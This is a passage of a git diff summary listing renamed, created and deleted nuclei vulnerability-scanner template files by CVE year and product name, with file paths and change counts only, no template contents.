nuclei-templates/Other/xp-webcam-11699.yaml | 4 + ....yaml => xss-fuzz-html-tag-injection.yaml} | 0 nuclei-templates/Other/xss-fuzz.yaml | 37 + nuclei-templates/Other/xvr-login-11702.yaml | 20 - nuclei-templates/Other/xvr-login-11705.yaml | 24 + .../Other/xxljob-default-login-11712.yaml | 44 + .../Other/xxljob-default-login-11714.yaml | 52 - nuclei-templates/Other/xxljob-panel.yaml | 7 +- ...tect-11720.yaml => yapi-detect-11719.yaml} | 0 ...api-rce-11724.yaml => yapi-rce-11725.yaml} | 0 nuclei-templates/Other/yarn-lock-11728.yaml | 30 - nuclei-templates/Other/yarn-lock-11729.yaml | 25 + .../Other/yarn-manager-exposure-11731.yaml | 19 + .../Other/yarn-manager-exposure-11733.yaml | 17 - .../Other/yarn-resourcemanager-rce-11734.yaml | 23 + .../Other/yarn-resourcemanager-rce-11735.yaml | 21 - .../Other/yii-debugger-11739.yaml | 34 - .../Other/yii-debugger-11740.yaml | 38 + ...ltextfile.yaml => yongyou-ELTextFile.yaml} | 0 .../Other/yongyou-icurrtype-sqli.yaml | 33 - nuclei-templates/Other/yongyou-jdbcRead.yaml | 42 + .../Other/yongyou-ssrf-11745.yaml | 15 + nuclei-templates/Other/yongyou-ssrf.yaml | 16 - ...ml => yonyou-u8-registerservlet-sqli.yaml} | 0 ..._ncchr_attachment_uploadchunk_upload.yaml} | 0 .../Other/yopass-panel-11749.yaml | 19 - nuclei-templates/Other/yopass-panel.yaml | 16 + ...fileread.yaml => yunxintong-fileRead.yaml} | 0 .../Other/zabbix-dashboards-access-11757.yaml | 12 +- .../zabbix-default-credentials-11758.yaml | 27 - .../Other/zabbix-default-credentials.yaml | 22 + .../Other/zabbix-default-login-11762.yaml | 8 +- .../Other/zabbix-error-11764.yaml | 20 - .../Other/zabbix-error-11766.yaml | 19 + .../Other/zabbix-server-login-11767.yaml | 20 - .../Other/zabbix-server-login.yaml | 19 + .../Other/zcms-v3-sqli-11773.yaml | 23 - nuclei-templates/Other/zcms-v3-sqli.yaml | 23 + .../Other/zend-config-file-11778.yaml | 22 + nuclei-templates/Other/zend-config-file.yaml | 37 - .../Other/zendesk-takeover-11781.yaml | 19 + .../Other/zendesk-takeover-11783.yaml | 16 - .../zenphoto-installation-sensitive-info.yaml | 33 - .../Other/zenphoto-sensitive-info.yaml | 28 + ...ct-11785.yaml => zentao-detect-11787.yaml} | 0 .../Other/zhiyuan-file-upload-11791.yaml | 33 - .../Other/zhiyuan-file-upload-11794.yaml | 28 + .../Other/zhiyuan-oa-session-leak-11804.yaml | 8 +- ...aml => zhiyuan-oa-unauthorized-11808.yaml} | 0 ...rf-11810.yaml => zimbra-preauth-ssrf.yaml} | 0 .../Other/zimbra-web-client-11814.yaml | 32 - nuclei-templates/Other/zimbra-web-client.yaml | 23 + .../Other/zip-backup-files-11815.yaml | 51 + .../Other/zip-backup-files-11818.yaml | 57 - .../Other/zm-system-log-detect-11833.yaml | 25 + .../Other/zm-system-log-detect-11834.yaml | 21 - .../Other/zoho-webhook-token-11835.yaml | 2 - ...{zuul-panel-11842.yaml => zuul-panel.yaml} | 0 ...\346\234\215\345\212\241\345\231\250.yaml" | 20 + ...4\270\232erp\347\263\273\347\273\237.yaml" | 24 + ...1\200\240erp\347\263\273\347\273\237.yaml" | 19 + ...\347\220\206\345\271\263\345\217\260.yaml" | 21 + ...4\270\232erp\347\263\273\347\273\237.yaml" | 20 + ...\344\272\221\345\271\263\345\217\260.yaml" | 25 + ...\345\256\207\350\247\206vs-isc5000-e.yaml" | 20 + ...\350\275\257\346\212\245\350\241\250.yaml" | 26 + ...\347\255\226\347\263\273\347\273\237.yaml" | 19 + ...45\271\277\350\201\224\350\276\276oa.yaml" | 24 + .../Other/\345\276\256\345\256\217oa.yaml" | 24 + .../Other/\346\205\247\347\202\271oa.yaml" | 19 + ...6\213\223\345\260\224\346\200\235sso.yaml" | 24 + ...6\213\223\345\260\224\346\200\235was.yaml" | 19 + ...\346\214\207\346\216\214\346\230\223.yaml" | 24 + ...\344\272\221\345\271\263\345\217\260.yaml" | 25 + ...346\263\233\345\276\256-oa e-cology8.yaml" | 20 + ...47\250\213\346\226\275\345\267\245oa.yaml" | 20 + ...\344\272\221\345\271\263\345\217\260.yaml" | 21 + ...\345\214\226\347\263\273\347\273\237.yaml" | 26 + ...\345\205\254\345\271\263\345\217\260.yaml" | 21 + ...\345\205\254\350\275\257\344\273\266.yaml" | 27 + ...\347\220\206\350\275\257\344\273\266.yaml" | 33 + ...\347\220\206\350\275\257\344\273\266.yaml" | 20 + ...\347\220\206\350\275\257\344\273\266.yaml" | 19 + ...\351\233\206\345\233\242\347\211\210.yaml" | 20 + ...\347\220\206\350\275\257\344\273\266.yaml" | 26 + .../Other/\350\207\264\350\277\234a8n.yaml" | 19 + ...\347\273\204\347\273\207\347\211\210.yaml" | 19 + ...\347\273\204\347\273\207\347\211\210.yaml" | 19 + ...\345\205\254\350\275\257\344\273\266.yaml" | 19 + ...\346\234\215\345\212\241\345\231\250.yaml" | 24 + .../Other/\351\223\255\351\243\236mcms.yaml" | 22 + 3802 files changed, 54553 insertions(+), 314894 deletions(-) create mode 100644 nuclei-templates/CVE-2000/CVE-2000-0114.yaml delete mode 100644 nuclei-templates/CVE-2000/cve-2000-0114.yaml delete mode 100644 nuclei-templates/CVE-2006/CVE-2006-1681.yaml create mode 100644 nuclei-templates/CVE-2006/cve-2006-1681.yaml rename nuclei-templates/CVE-2007/{cve-2007-5728.yaml => CVE-2007-5728.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2008/CVE-2008-2398.yaml rename nuclei-templates/CVE-2008/{cve-2008-2650.yaml => CVE-2008-2650.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2008/CVE-2008-4668.yaml delete mode 100644 nuclei-templates/CVE-2008/CVE-2008-6080.yaml create mode 100644 nuclei-templates/CVE-2008/cve-2008-2398.yaml create mode 100644 nuclei-templates/CVE-2008/cve-2008-4668.yaml create mode 100644 nuclei-templates/CVE-2008/cve-2008-6080.yaml rename nuclei-templates/CVE-2009/{cve-2009-0932.yaml => CVE-2009-0932.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-1496.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-1558.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-2100.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-3053.yaml rename nuclei-templates/CVE-2009/{cve-2009-3318.yaml => CVE-2009-3318.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-4202.yaml create mode 100644 nuclei-templates/CVE-2009/CVE-2009-4223.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-4679.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-1496.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-1558.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-2100.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-3053.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-4202.yaml delete mode 100644 nuclei-templates/CVE-2009/cve-2009-4223.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-4679.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0219.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0696.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0944.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0972.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0982.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0985.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1217.yaml rename nuclei-templates/CVE-2010/{cve-2010-1305.yaml => CVE-2010-1305.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1306.yaml => CVE-2010-1306.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1307.yaml => CVE-2010-1307.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1313.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1469.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1470.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1473.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1475.yaml rename nuclei-templates/CVE-2010/{cve-2010-1476.yaml => CVE-2010-1476.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1491.yaml => CVE-2010-1491.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1531.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1532.yaml rename nuclei-templates/CVE-2010/{cve-2010-1534.yaml => CVE-2010-1534.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1540.yaml rename nuclei-templates/CVE-2010/{cve-2010-1601.yaml => CVE-2010-1601.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1602.yaml => CVE-2010-1602.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1653.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1714.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1715.yaml rename nuclei-templates/CVE-2010/{cve-2010-1717.yaml => CVE-2010-1717.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1718.yaml rename nuclei-templates/CVE-2010/{cve-2010-1719.yaml => CVE-2010-1719.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1722.yaml => CVE-2010-1722.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1871.yaml rename nuclei-templates/CVE-2010/{cve-2010-1878.yaml => CVE-2010-1878.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1952.yaml => CVE-2010-1952.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1953.yaml => CVE-2010-1953.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1954.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1957.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1979.yaml rename nuclei-templates/CVE-2010/{cve-2010-1983.yaml => CVE-2010-1983.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2033.yaml => CVE-2010-2033.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2035.yaml rename nuclei-templates/CVE-2010/{cve-2010-2050.yaml => CVE-2010-2050.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2128.yaml => CVE-2010-2128.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2259.yaml rename nuclei-templates/CVE-2010/{cve-2010-2307.yaml => CVE-2010-2307.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2861.yaml => CVE-2010-2861.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2918.yaml => CVE-2010-2918.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2920.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-3426.yaml create mode 100644 nuclei-templates/CVE-2010/CVE-2010-4239.yaml rename nuclei-templates/CVE-2010/{cve-2010-4617.yaml => CVE-2010-4617.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-4769.yaml => CVE-2010-4769.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-5028.yaml => CVE-2010-5028.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-5278.yaml => CVE-2010-5278.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-5286.yaml => CVE-2010-5286.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-0219.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0696.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0944.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0972.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0982.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0985.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1056.yaml => cve-2010-1056.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1217.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1313.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1314.yaml => cve-2010-1314.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1469.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1470.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1473.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1475.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1495.yaml => cve-2010-1495.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1531.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1532.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1540.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1653.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1658.yaml => cve-2010-1658.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1714.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1715.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1718.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1871.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1954.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1957.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1979.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-2035.yaml rename nuclei-templates/CVE-2010/{CVE-2010-2045.yaml => cve-2010-2045.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-2259.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-2920.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-3426.yaml delete mode 100644 nuclei-templates/CVE-2010/cve-2010-4239.yaml rename nuclei-templates/CVE-2011/{cve-2011-1669.yaml => CVE-2011-1669.yaml} (100%) rename nuclei-templates/CVE-2011/{cve-2011-2780.yaml => CVE-2011-2780.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-4336.yaml rename nuclei-templates/CVE-2011/{cve-2011-4624.yaml => CVE-2011-4624.yaml} (100%) create mode 100644 nuclei-templates/CVE-2011/cve-2011-4336.yaml rename nuclei-templates/CVE-2011/{CVE-2011-5106.yaml => cve-2011-5106.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-0392.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-0896.yaml rename nuclei-templates/CVE-2012/{cve-2012-1823.yaml => CVE-2012-1823.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-1835.yaml rename nuclei-templates/CVE-2012/{cve-2012-2371.yaml => CVE-2012-2371.yaml} (100%) rename nuclei-templates/CVE-2012/{cve-2012-3153.yaml => CVE-2012-3153.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-4253.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-4547.yaml rename nuclei-templates/CVE-2012/{cve-2012-4889.yaml => CVE-2012-4889.yaml} (100%) create mode 100644 nuclei-templates/CVE-2012/cve-2012-0392.yaml create mode 100644 nuclei-templates/CVE-2012/cve-2012-0896.yaml rename nuclei-templates/CVE-2012/{CVE-2012-0901.yaml => cve-2012-0901.yaml} (100%) create mode 100644 nuclei-templates/CVE-2012/cve-2012-1835.yaml create mode 100644 nuclei-templates/CVE-2012/cve-2012-4253.yaml rename nuclei-templates/CVE-2012/{CVE-2012-4273.yaml => cve-2012-4273.yaml} (100%) create mode 100644 nuclei-templates/CVE-2012/cve-2012-4547.yaml rename nuclei-templates/CVE-2013/{cve-2013-2251.yaml => CVE-2013-2251.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-2287.yaml delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-3526.yaml create mode 100644 nuclei-templates/CVE-2013/CVE-2013-6281.yaml rename nuclei-templates/CVE-2013/{cve-2013-7240.yaml => CVE-2013-7240.yaml} (100%) create mode 100644 nuclei-templates/CVE-2013/cve-2013-2287.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-3526.yaml delete mode 100644 nuclei-templates/CVE-2013/cve-2013-6281.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-1203.yaml create mode 100644 nuclei-templates/CVE-2014/CVE-2014-2321.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-2323.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-2383.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-2962.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-3120.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-3206.yaml rename nuclei-templates/CVE-2014/{cve-2014-3704.yaml => CVE-2014-3704.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4210.yaml => CVE-2014-4210.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-4535.yaml rename nuclei-templates/CVE-2014/{cve-2014-4539.yaml => CVE-2014-4539.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4544.yaml => CVE-2014-4544.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4550.yaml => CVE-2014-4550.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4592.yaml => CVE-2014-4592.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4940.yaml => CVE-2014-4940.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/CVE-2014-4942.yaml rename nuclei-templates/CVE-2014/{cve-2014-5258.yaml => CVE-2014-5258.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-5368.yaml => CVE-2014-5368.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-6271.yaml => CVE-2014-6271.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-8799.yaml rename nuclei-templates/CVE-2014/{cve-2014-9444.yaml => CVE-2014-9444.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-9608.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-1203.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-2321.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-2323.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-2383.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-2962.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-3120.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-3206.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-4535.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-4942.yaml rename nuclei-templates/CVE-2014/{CVE-2014-8682.yaml => cve-2014-8682.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/cve-2014-8799.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-9608.yaml rename nuclei-templates/CVE-2015/{cve-2015-0554.yaml => CVE-2015-0554.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-1000012.yaml rename nuclei-templates/CVE-2015/{cve-2015-1880.yaml => CVE-2015-1880.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-2067.yaml rename nuclei-templates/CVE-2015/{cve-2015-2068.yaml => CVE-2015-2068.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-3224.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-3337.yaml rename nuclei-templates/CVE-2015/{cve-2015-3897.yaml => CVE-2015-3897.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-4414.yaml => CVE-2015-4414.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-5461.yaml => CVE-2015-5461.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-5471.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-6544.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-7377.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-7450.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-7823.yaml rename nuclei-templates/CVE-2015/{cve-2015-8349.yaml => CVE-2015-8349.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-8399.yaml rename nuclei-templates/CVE-2015/{cve-2015-8813.yaml => CVE-2015-8813.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-9414.yaml => CVE-2015-9414.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/cve-2015-1000012.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-2067.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-3224.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-3337.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-5471.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-6544.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-7377.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-7450.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-7823.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-8399.yaml rename nuclei-templates/CVE-2015/{CVE-2015-9480.yaml => cve-2015-9480.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-0957.yaml => CVE-2016-0957.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000128.yaml => CVE-2016-1000128.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000131.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000133.yaml rename nuclei-templates/CVE-2016/{cve-2016-1000138.yaml => CVE-2016-1000138.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000139.yaml => CVE-2016-1000139.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000140.yaml => CVE-2016-1000140.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000142.yaml => CVE-2016-1000142.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000143.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000149.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000152.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000154.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-10033.yaml rename nuclei-templates/CVE-2016/{cve-2016-10924.yaml => CVE-2016-10924.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-10960.yaml => CVE-2016-10960.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-2389.yaml => CVE-2016-2389.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-3081.yaml => CVE-2016-3081.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-3978.yaml => CVE-2016-3978.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-4977.yaml create mode 100644 nuclei-templates/CVE-2016/CVE-2016-6210.yaml rename nuclei-templates/CVE-2016/{cve-2016-7552.yaml => CVE-2016-7552.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-8527.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000131.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000133.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000143.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000149.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000152.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000154.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-10033.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-4977.yaml delete mode 100644 nuclei-templates/CVE-2016/cve-2016-6210.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-8527.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-1000028.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-10271.yaml rename nuclei-templates/CVE-2017/{cve-2017-10974.yaml => CVE-2017-10974.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-11610.yaml rename nuclei-templates/CVE-2017/{cve-2017-12149.yaml => CVE-2017-12149.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12544.yaml => CVE-2017-12544.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12611.yaml => CVE-2017-12611.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12615.yaml => CVE-2017-12615.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12629.yaml => CVE-2017-12629.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-12794.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-14535.yaml rename nuclei-templates/CVE-2017/{cve-2017-14651.yaml => CVE-2017-14651.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-15287.yaml rename nuclei-templates/CVE-2017/{cve-2017-15363.yaml => CVE-2017-15363.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-15647.yaml rename nuclei-templates/CVE-2017/{cve-2017-16806.yaml => CVE-2017-16806.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-17451.yaml rename nuclei-templates/CVE-2017/{cve-2017-3528.yaml => CVE-2017-3528.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-4011.yaml rename nuclei-templates/CVE-2017/{cve-2017-5638.yaml => CVE-2017-5638.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-6090.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-7615.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-8917.yaml rename nuclei-templates/CVE-2017/{cve-2017-9288.yaml => CVE-2017-9288.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-9791.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-9833.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-9841.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-1000028.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-10271.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-11610.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-12794.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-14535.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-15287.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-15647.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-17451.yaml rename nuclei-templates/CVE-2017/{CVE-2017-18536.yaml => cve-2017-18536.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/cve-2017-4011.yaml rename nuclei-templates/CVE-2017/{CVE-2017-5487.yaml => cve-2017-5487.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/cve-2017-6090.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-7615.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-8917.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-9791.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-9833.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-9841.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-1000856.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-1000861.yaml rename nuclei-templates/CVE-2018/{cve-2018-10201.yaml => CVE-2018-10201.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-10230.yaml rename nuclei-templates/CVE-2018/{cve-2018-10818.yaml => CVE-2018-10818.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-10823.yaml => CVE-2018-10823.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-10956.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-11231.yaml rename nuclei-templates/CVE-2018/{cve-2018-11510.yaml => CVE-2018-11510.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-11709.yaml => CVE-2018-11709.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-11776.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-11784.yaml rename nuclei-templates/CVE-2018/{cve-2018-12031.yaml => CVE-2018-12031.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-12054.yaml => CVE-2018-12054.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-12300.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-12613.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-1271.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-13379.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-13980.yaml rename nuclei-templates/CVE-2018/{cve-2018-14064.yaml => CVE-2018-14064.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-14574.yaml => CVE-2018-14574.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-14916.yaml rename nuclei-templates/CVE-2018/{cve-2018-14918.yaml => CVE-2018-14918.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-15473.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-15657.yaml rename nuclei-templates/CVE-2018/{cve-2018-15745.yaml 